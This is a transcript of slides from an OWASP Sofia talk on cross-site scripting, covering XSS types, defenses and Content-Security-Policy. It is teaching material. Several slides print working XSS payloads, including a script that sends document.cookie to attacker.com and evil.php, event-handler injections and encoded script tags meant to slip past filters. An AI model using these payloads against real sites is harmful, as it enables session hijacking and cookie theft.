[OWASP Sofia] Dimitar Boyanov - XSS Attacks and Defenses (27th of April, 2021)

Transcript

1. XSS Attacks and Defenses Dimitar Boyanov, [email protected] Software Engineer, Security,

   Progress April 27, 2021

2. Agenda  Why  Demo – XSS  What is

   XSS  Types of XSS  Defenses  Demo - CSP  References  Q & A

3. Why? – XSS in the news March 21, 2021 Multiple

   XSS Vulnerabilities Found In Elementor WordPress Plugin Risked Millions of Websites February 24, 2021 Apple Patched A Stored XSS Vulnerability In iCloud Domain February 12, 2021 Reflected XSS Vulnerability Existed In PayPal Currency Conv erter Wallet

4. DEMO – XSS Attack  What can be achieved by

   loading a “special” script on a vulnerable site?

5. OWASP Top 10 (2017) 1. Injection 2. Broken Authentication 3.

   Sensitive Data Exposure 4. XML External Entities (XXE) 5. Broken Access Control 6. Security Misconfiguration 7. Cross-Site Scripting (XSS) 8. Insecure Deserialization 9. Using Components with Known Vulnerabilities 10. Insufficient Logging & Monitoring

6. Cross-Site Scripting (XSS)- Definition  XSS flaws occur whenever an

   application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user- supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.  XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.

7. Cross-Site Scripting (XSS) – Detect, Reflected  Reflected XSS: The

   application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically, the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.

8. Cross-Site Scripting (XSS) – Example, Reflected  Example - Reflected

   XSS:  Core of many phishing schemes  The application uses untrusted data in the construction of the following HTML snippet without validation or escaping: (String) page += "<input name='creditcard' type='TEXT’ value='" + request.getParameter("CC") + “’>”; The attacker modifies the ‘CC’ parameter in the browser to: '><script>document.location='http://www.attacker.com/cgi- bin/cookie.cgi?foo='+document.cookie</script>'

9. Cross-Site Scripting (XSS) – Detect, Stored  Stored XSS: The

   application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.

10. Cross-Site Scripting (XSS) - Detect  DOM XSS: JavaScript frameworks,

    single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, the application would not send attacker- controllable data to unsafe JavaScript APIs. Typical XSS attacks include session stealing, account takeover, MFA bypass, DOM node replacement or defacement (such as trojan login panels), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks.

11. Cross-Site Scripting (XSS) - Attacks  Attack vectors – Reflected

    (Request), Persisted (DB), External (CDN) <body onload=alert('test1’)> <b onmouseover=alert('Wufff!')>click me!</b> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> <IMG SRC=j&#X41vascript:alert('test2')> <SCRIPT type="text/javascript"> var addr = '../evil.php?cakemonster=' + escape(document.cookie); </SCRIPT>

12. Cross-Site Scripting (XSS) - Attacks <? php print "Not found:

    " . urldecode($_SERVER["REQUEST_URI"]); ?> http://testsite.test/file_which_not_exist http://testsite.test/<script>alert("TEST");</script>

13. Cross-Site Scripting (XSS) - Question What is this?  %3C%73%63%72%69%70%74%3E

     &#x3C; &#x73; &#x63; &#x72; &#x69; &#x70; &#x74; &#x3E;  &#60&#115&#99&#114&#105&#112&#116&#62  +ADw-SCRIPT+AD4- <script>

14. Cross-Site Scripting (XSS) - Defenses  Validation  Data Preparation

     Output encoding  Header protections (defense-in-depth)

15. Cross-Site Scripting (XSS) – Defenses - Validation  Blacklist 

    Whitelist  Indirect selection  Parse  Regular expressions

16. Cross-Site Scripting (XSS) – Defenses – Data Preparation  Encoding

     HTTP Response - content-type: text/html; charset=utf-8;  HTML encoding <head> <meta charset="UTF-8"> </head>

17. Cross-Site Scripting (XSS) – Defenses – Output Encoding  Specific

    to each injection context  HTML Еlement  HTML Attribute  URL  Javascript  CSS  HTML comment

18. Cross-Site Scripting (XSS) – Defenses – Header Protections Header protections

    (defense-in-depth)  HttpOnly flag  Cookies cannot be access from javascript  Content-Security-Policy  Declare which dynamic resources are allowed to load.  script-src, style-src, img-src, connect-src, font-src, etc.

19. CSP Header Official Spec: https://www.w3.org/TR/CSP3/ Site: https://content-security-policy.com/  CSP Header

    utilizes modern browsers’ built-in XSS protections  Strong defense-in-depth protection.  It was designed to prevent XSS.  Reduce XSS risks on modern browsers by declaring, which dynamic resources are allowed to load  It can remove the “cross” part of the “cross-site-scripting”  Still not widely used. Only ~6% of top 1M sites use it by 2020.

20. CSP Fetch Directives  CSP Fetch Directives - control the

    locations from which certain resource types may be loaded.  default-src – fallback (all)  script-src – restricts the locations from which scripts may be executed  connect-src - directive restricts the URLs which can be loaded using script interfaces  child-src - directive governs the creation of nested browsing contexts (e.g., iframe)  worker-src - restricts the URLs which may be loaded as a Worker, SharedWorker, or ServiceWorker  font-src, frame-src, img-src, media-src, object-src, style-src

21. CSP – Other Directives  Document Directives - control the

    locations from which certain resource types may be loaded.  Navigation Directives  form-action - restricts the URLs which can be used as the target of a form submissions from a given context.  frame-ancestors - restricts the URLs which can embed the resource using frame, iframe, object, or embed.  Protects from Clickjacking and Phishing attacks  navigate-to - restricts the URLs to which a document can initiate navigations by any means  Reporting Directives

22. Demo – CSP Sitefinity CSP directives

23. How to Discover XSS - Tools  HTTP Proxies (Burp,

    ZAP)  Static/Dynamic Scanners (Veracode, IBM App Scan)  Vulnerable libraries (Dependency Check, Retire.js)  Penetration testing

24. Demo – XSS game  http://xss-game.appspot.com/

25. Summary  XSS allows attackers to execute scripts  Protections

     Validation  Data Preparation  Output encoding  Header protections (defense-in-depth) - CSP

26. Q & A

27. Thank You! Now It’s Your Turn!